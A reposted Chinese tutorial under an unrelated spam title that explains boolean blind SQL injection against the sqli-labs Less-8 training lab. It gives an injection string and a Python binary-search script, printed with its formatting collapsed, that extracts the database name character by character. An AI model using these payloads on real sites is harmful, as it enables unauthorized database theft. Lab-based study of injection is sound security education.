您的位置:首页 > 健康 > 养生 > 报告查一查_大连装修公司前十名_产品网络推广_千锋教育地址

报告查一查_大连装修公司前十名_产品网络推广_千锋教育地址

2024/12/25 12:54:24 来源:https://blog.csdn.net/m0_56019217/article/details/144014748  浏览:    关键词:报告查一查_大连装修公司前十名_产品网络推广_千锋教育地址
报告查一查_大连装修公司前十名_产品网络推广_千锋教育地址

布尔盲注的原理

在SQL注入时,我们查询的数据不会直接回显在界面上,且界面对正确的查询和错误的查询有不同的回显,我们就可以使用布尔盲注。

比如sqli-labs的第八题,当我们输入的查询语句是正确的时候,回显就是you are in.
当查询语句错误的时候,就没有这样的回显。
在这里插入图片描述
在这里插入图片描述
我们可以利用这样的特性来判断我们的查询是否正确。

相关的函数:

substr(string,start,length)
第一个参数是要截取的字符串
第二个参数是截取开始的位置
第三个参数是截取的长度

例如:
substr(“shuai”,3,1) 截取的结果是u
substr(“shuai”,2,3) 截取的结果是hua

ascii(char)
返回字符的ASCII码值

基本注入语句:

id=1' and ascii(substr(select database(),n,1))>m

n是要截取的字符的位置,而m是要比较的ascii码值。

二分法布尔盲注脚本:

import requestsurl = "http://127.0.0.1/sqli-labs/Less-8/"def inject_database(url):name = ''for i in range(1, 100):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr((select database()),%d,1)) > %d-- " % (i, mid)params = {"id": payload}r = requests.get(url, params=params)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database(url)

实例应用

以sqli-labs第八题为例:
在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com